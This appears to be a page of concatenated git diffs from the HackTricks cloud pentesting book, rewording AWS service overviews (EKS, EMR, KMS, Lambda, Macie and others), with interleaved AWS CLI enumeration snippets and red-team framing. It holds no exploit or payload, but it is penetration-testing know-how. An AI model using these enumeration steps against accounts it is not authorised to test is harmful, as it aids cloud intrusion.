Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md index c7f0284a3e..e811596c72 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md @@ -16,7 +16,15 @@ Other ways to support HackTricks: ## EKS -Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service that you can use to run Kubernetes on AWS without needing to install, operate, and maintain your own Kubernetes control plane or nodes. +Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. + +Key aspects of Amazon EKS include: + +1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. +2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. +3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. +4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. + ### Enumeration @@ -44,6 +52,9 @@ aws eks describe-update --name --update-id [aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md) {% endcontent-ref %} +# References +* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) +
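As a quick access sketch: with valid AWS credentials that can reach the cluster, a kubeconfig entry can be generated and the Kubernetes API queried directly (cluster name and region are placeholders):

```bash
# Generate a kubeconfig entry for the managed control plane
aws eks update-kubeconfig --region us-east-1 --name my-cluster

# Verify what the mapped Kubernetes identity can do
kubectl get nodes
kubectl auth can-i --list
```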
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md index fb701654eb..b0538f3081 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md @@ -16,23 +16,40 @@ Other ways to support HackTricks: ## EMR -EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark. +AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. -From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters. +Key characteristics include: -One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available. +- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: + - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. + - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: + - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. + - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider. -* **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm. +- **Encryption in Transit**: Focuses on securing data during transfer. Options include: + - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: + - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. + - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. -From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts. 
+Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: -Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. +- **Hadoop**: + - Might reduce encrypted shuffle using TLS. + - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. + +- **Presto** (EMR version 5.6.0+): + - Internal communication between Presto nodes is secured using SSL and TLS. + +- **Tez Shuffle Handler**: + - Utilizes TLS for encryption. + +- **Spark**: + - Employs TLS for the Akka protocol. + - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. + - External shuffle service is secured with the Simple Authentication Security Layer. + +These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. -* Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration. -* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. -* Tez Shuffle Handler uses TLS. -* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer. ### Enumeration @@ -53,6 +70,9 @@ aws emr list-studios #Get studio URLs [aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md) {% endcontent-ref %} +# References +* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) +
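An illustrative sketch of creating such a security configuration via the CLI — the name, bucket and KMS key ARN are hypothetical, and the JSON follows the documented `create-security-configuration` schema:

```bash
aws emr create-security-configuration --name my-sec-config \
  --security-configuration '{
    "EncryptionConfiguration": {
      "EnableInTransitEncryption": true,
      "EnableAtRestEncryption": true,
      "InTransitEncryptionConfiguration": {
        "TLSCertificateConfiguration": {
          "CertificateProviderType": "PEM",
          "S3Object": "s3://my-bucket/certs.zip"
        }
      },
      "AtRestEncryptionConfiguration": {
        "S3EncryptionConfiguration": { "EncryptionMode": "SSE-S3" },
        "LocalDiskEncryptionConfiguration": {
          "EncryptionKeyProviderType": "AwsKms",
          "AwsKmsKey": "arn:aws:kms:us-east-1:123456789012:key/example-key-id"
        }
      }
    }
  }'
```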
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md index f574b38b74..45f5f97c3f 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md @@ -16,9 +16,10 @@ Other ways to support HackTricks:

## KMS - Key Management Service

-AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control customer master keys** (CMKs), the encryption keys used to encrypt your data. AWS KMS CMKs are generally **protected by hardware security modules** (HSMs).
+AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys.
+
+KMS uses **symmetric cryptography**. This is used to **encrypt information at rest** (for example, inside S3). If you need to **encrypt information in transit** you need to use something like **TLS**.

-KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\
KMS is a **region specific service**. **Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application; it's up to us to administer our encryption keys and administer how those keys are used.

diff --git a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md index b9cdd8aefa..7de4a3e52c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md @@ -16,7 +16,7 @@ Other ways to support HackTricks:

## Lambda

-Amazon Web Services (AWS) Lambda is a compute service that lets you **run code without provisioning or managing servers**. Lambda **automatically manages the resources required** to run your code and provides high availability, scaling, and security features. With Lambda, **you only pay for the compute time that you consume**, and there are no upfront costs or long-term commitments.
+Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations.

To call a lambda it's possible to call it as **frequently as you want** (with Cloudwatch), **expose** a **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in an **S3** bucket or updates to a **DynamoDB** table. 
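For instance, a direct invocation and a check for an exposed function URL could look like this (function name and payload are placeholders; `--cli-binary-format` applies to AWS CLI v2):

```bash
# Invoke the function directly with a test payload
aws lambda invoke --function-name my-function \
  --payload '{"key":"value"}' --cli-binary-format raw-in-base64-out response.json

# Check whether a public function URL is configured
aws lambda get-function-url-config --function-name my-function
```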
diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md index 3c9db800b1..7b83700fe1 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md @@ -14,21 +14,25 @@ Other ways to support HackTricks:
-## AWS - MQ +## Amazon MQ -**Message brokers** allow software systems, which often use different programming languages on various platforms, to communication and exchange information. **Amazon MQ** is a managed message broker service for **Apache ActiveMQ** and **RabbitMQ** that streamlines setup, operation, and management of message brokers on AWS. With a few steps, Amazon MQ can provision your message broker with support for software version upgrades. +### Introduction to Message Brokers +**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. ### AWS - RabbitMQ +RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. -RabbitMQ is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is **software where queues are defined**, to which **applications connect** in order to **transfer a message** or messages. - -A message can include any kind of information. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message. +### AWS - ActiveMQ +Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: -AWS offers to **host and manage in an easy way RabbitMQ servers**. +- Connect with clients written in JavaScript, C, C++, Python, .Net, and more. +- Leverage the **AMQP** protocol to integrate applications from different platforms. +- Use **STOMP** over websockets for web application message exchanges. +- Manage IoT devices with **MQTT**. +- Maintain existing **JMS** infrastructure and extend its capabilities. -### AWS - ActiveMQ +ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. -Apache ActiveMQ® is the most popular open source, multi-protocol, Java-based **message broker**. It supports industry standard protocols so users get the benefits of client choices across a broad range of languages and platforms. Connect from clients written in JavaScript, C, C++, Python, .Net, and more. Integrate your multi-platform applications using the ubiquitous **AMQP** protocol. Exchange messages between your web applications using **STOMP** over websockets. Manage your IoT devices using **MQTT**. 
Support your existing **JMS** infrastructure and beyond. ActiveMQ offers the power and flexibility to support any messaging use-case. ## Enumeration diff --git a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md index 4d97693e4a..5632c75f50 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md @@ -16,10 +16,10 @@ Other ways to support HackTricks: ## Amazon MSK -Amazon **Managed Streaming for Apache Kafka** (Amazon MSK) is a fully managed service that enables you to build and run applications that use **Apache Kafka to process streaming data**. Amazon MSK provides the control-plane operations, such as those for creating, updating, and deleting **clusters**.\ -It lets you use Apache **Kafka data-plane operations**, such as those for producing and consuming data. It runs **open-source versions of Apache Kafka**. This means existing applications, tooling, and plugins from partners and the **Apache Kafka community are supported** without requiring changes to application code. +**Amazon Managed Streaming for Apache Kafka (Amazon MSK)** is a service that is fully managed, facilitating the development and execution of applications processing streaming data through **Apache Kafka**. Control-plane operations, including creation, update, and deletion of **clusters**, are offered by Amazon MSK. +The service permits the utilization of Apache Kafka **data-plane operations**, encompassing data production and consumption. It operates on **open-source versions of Apache Kafka**, ensuring compatibility with existing applications, tooling, and plugins from both partners and the **Apache Kafka community**, eliminating the need for alterations in the application code. -Amazon MSK **detects and automatically recovers from the most common failure scenarios** for clusters so that your producer and consumer applications can continue their write and read operations with minimal impact. In addition, where possible, it **reuses the storage** from the older **broker** to **reduce the data that Apache Kafka needs to replicate.** +In terms of reliability, Amazon MSK is designed to **automatically detect and recover from prevalent cluster failure scenarios**, ensuring that producer and consumer applications persist in their data writing and reading activities with minimal disruption. Moreover, it aims to optimize data replication processes by attempting to **reuse the storage of replaced brokers**, thereby minimizing the volume of data that needs to be replicated by Apache Kafka. ### **Types** diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md index 473e826ad5..1419aee286 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md @@ -16,13 +16,16 @@ Other ways to support HackTricks: ## AWS Secrets Manager -AWS Secrets Manager allows you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**. 
+AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. -AWS Secrets Manager enables the **ease of rotating secrets** and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys. +The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. -Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies. +The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. -To allow a user form a different account to access your secret you need to authorize him to access the secret and also authorize him to decrypt the secret in KMS. The Key policy also needs to allows the external user to use it. +For granting access to secrets to a user from a different AWS account, it's necessary to: +1. Authorize the user to access the secret. +2. Grant permission to the user to decrypt the secret using KMS. +3. Modify the Key policy to allow the external user to utilize it. **AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md index 033cedf194..17942f0770 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md @@ -16,9 +16,10 @@ Other ways to support HackTricks: ## Detective -**Detective** makes it easy to **analyze, investigate, and quickly identify the root cause** of potential security issues or suspicious activities. Amazon Detective automatically **collects log data** from your AWS resources and uses **machine learning, statistical analysis, and graph theory** to build a linked set of data that enables you to easily conduct faster and more efficient security investigations. +**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. + +The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. 
This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. -Amazon Detective **simplifies the process of digging deeper in security issues** by enabling your security teams to easily investigate and **quickly get to the root cause of a finding**. Amazon Detective can analyze trillions of events from multiple data sources such as Virtual Private Cloud (VPC) Flow Logs, AWS CloudTrail, and Amazon GuardDuty, and automatically creates a **unified, interactive view of your resources,** users, and the interactions between them over time. With this unified view, you can visualize all the details and context in one place to identify the underlying reasons for the findings, drill down into relevant historical activities, and quickly determine the root cause. ## References diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md index b9ae34a0be..789e510441 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md @@ -16,15 +16,15 @@ Other ways to support HackTricks: ## Firewall Manager -AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources. +**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones. -It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active. +The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account. -**Requisites**: Created a Firewall Manager Master Account, setup an AWS organization and have added our member accounts and enable AWS Config. +**Prerequisites** include setting up a Firewall Manager Master Account, establishing an AWS organization with member accounts, and enabling AWS Config. 
-A **rule group** (a set of WAF rules together) can be added to an AWS Firewall Manager Policy which is then associated to AWS resources, such as your cloudfront distributions or application load balances. +A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers. -**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option). +It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. ## Enumeration @@ -58,6 +58,9 @@ aws fms list-admin-accounts-for-organization # ReadOnly policy is not enough for TODO, PRs accepted +# References +* [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) +
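A couple of additional calls that may complement the enumeration above — note they generally must be run from the Firewall Manager administrator account, and the policy ID is a placeholder:

```bash
# List the Firewall Manager policies defined for the organization
aws fms list-policies --region us-east-1

# Dump the definition of a specific policy
aws fms get-policy --policy-id 12345678-90ab-cdef-1234-567890abcdef --region us-east-1
```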
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md index 1824cd578f..cd69cfe290 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md @@ -14,86 +14,72 @@ Other ways to support HackTricks:
-## Macie
+# Macie

-The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account.
+Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **CloudTrail event** data and user behavior patterns.

-The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data.
+Key Features of Amazon Macie:

-Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data.\
-Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket.
+1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account.
+2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks.
+3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time.
+4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings.
+5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks.

-This protective and proactive security monitoring enables Amazon Macie to **identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data**.
+Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality.

-This is useful to avoid data leaks as Macie will detect if you are exposing people information to the Internet.
+## Alert System

-It's a **regional service**. 
+Macie categorizes alerts into predefined categories like: -It requires the existence of IAM Role 'AWSMacieServiceCustomerSetupRole' and it needs AWS CloudTrail to be enabled. +- Anonymized access +- Data compliance +- Credential Loss +- Privilege escalation +- Ransomware +- Suspicious access, etc. -Pre-defined alerts categories: +These alerts provide detailed descriptions and result breakdowns for effective response and resolution. -* Anonymized access -* Config compliance -* Credential Loss -* Data compliance -* Files hosting -* Identity enumeration -* Information loss -* Location anomaly -* Open permissions -* Privilege escalation -* Ransomware -* Service disruption -* Suspicious access +## Dashboard Features -The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. +The dashboard categorizes data into various sections, including: -The user has the possibility to create new custom alerts. +- S3 Objects (by time range, ACL, PII) +- High-risk CloudTrail events/users +- Activity Locations +- CloudTrail user identity types, and more. -**Dashboard categorization**: +## User Categorization -* S3 Objects for selected time range -* S3 Objects -* S3 Objects by PII - Personally Identifiable Information -* S3 Objects by ACL -* High-risk CloudTrail events and associated users -* High-risk CloudTrail errors and associated users -* Activity Location -* CloudTrail Events -* Activity ISPs -* CloudTrail user identity types +Users are classified into tiers based on the risk level of their API calls: -**User Categories**: Macie categorises the users in the following categories: +- **Platinum**: High-risk API calls, often with admin privileges. +- **Gold**: Infrastructure-related API calls. +- **Silver**: Medium-risk API calls. +- **Bronze**: Low-risk API calls. -* **Platinum**: Users or roles considered to be making high risk API calls. Often they have admins privileges. You should monitor the pretty god in case they are compromised -* **Gold**: Users or roles with history of calling APIs related to infrastructure changes. You should also monitor them -* **Silver**: Users or roles performing medium level risk API calls -* **Bronze**: Users or roles using lowest level of risk based on API calls +## Identity Types -**Identity types:** +Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. -* Root: Request made by root user -* IAM user: Request made by IAM user -* Assumed Role: Request made by temporary assumed credentials (AssumeRole API for STS) -* Federated User: Request made using temporary credentials (GetFederationToken API fro STS) -* AWS Account: Request made by a different AWS account -* AWS Service: Request made by an AWS service +## Data Classification -**Data classification**: 4 file classifications exists: +Data classification encompasses: -* Content-Type: list files based on content-type detected. The given risk is determined by the type of content detected. -* File Extension: Same as content-type but based on the extension -* Theme: Categorises based on a series of keywords detected within the files -* Regex: Categories based on specific regexps +- Content-Type: Based on detected content type. +- File Extension: Based on file extension. +- Theme: Categorized by keywords within files. +- Regex: Categorized based on specific regex patterns. 
-The final risk of a file will be the highest risk found between those 4 categories +The highest risk among these categories determines the file's final risk level. -The research function allows to create you own queries again all Amazon Macie data and perform a deep dive analysis of the data. You can filter results based on: CloudTrail Data, S3 Bucket properties and S3 Objects +## Research and Analysis -It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie. +Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. -### Enumeration + +## Enumeration ``` # Get buckets @@ -137,6 +123,9 @@ However, maybe an attacker could also be interested in disrupting it in order to TODO: PRs are welcome! +# References +* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) +
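In current deployments the findings described above are exposed through the `macie2` API; an illustrative enumeration sketch (the finding ID is a placeholder):

```bash
# List finding IDs and pull their details
aws macie2 list-findings --region us-east-1
aws macie2 get-findings --finding-ids <finding-id> --region us-east-1

# Review which S3 buckets Macie is monitoring
aws macie2 describe-buckets --region us-east-1
```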
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md index 49f66fee7b..d37483012c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -14,22 +14,26 @@ Other ways to support HackTricks:
-## Trusted Advisor
+# AWS Trusted Advisor Overview

-The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a **cross-region service**.
+Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories:

-1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money.
-2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services.
-3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities.
-4. **Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources.
+1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses.
+2. **Performance:** Identifies potential performance bottlenecks.
+3. **Security:** Scans for vulnerabilities or weak security configurations.
+4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance.

-The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, then you will only have access to **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\
-Trusted advisor can send notifications and you can exclude items from it.\
-Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.**
+The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security.

-### **Checks**
+## Notifications and Data Refresh

-#### CategoriesCore
+- Trusted Advisor can issue alerts.
+- Items can be excluded from its checks.
+- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh.
+
+## **Checks Breakdown**
+
+### Categories

1. Cost Optimization
2. Security
@@ -38,7 +42,9 @@ Trusted advisor data is **automatically refreshed every 24 hours**, **but** you
5. Service Limits
6. S3 Bucket Permissions

-#### Core Checks
+### Core Checks
+
+These are the only checks available to users without a business or enterprise support plan:

1. Security Groups - Specific Ports Unrestricted
2. IAM Use
@@ -47,24 +53,29 @@ Trusted advisor data is **automatically refreshed every 24 hours**, **but** you
5. RDS Public Snapshots
6. 
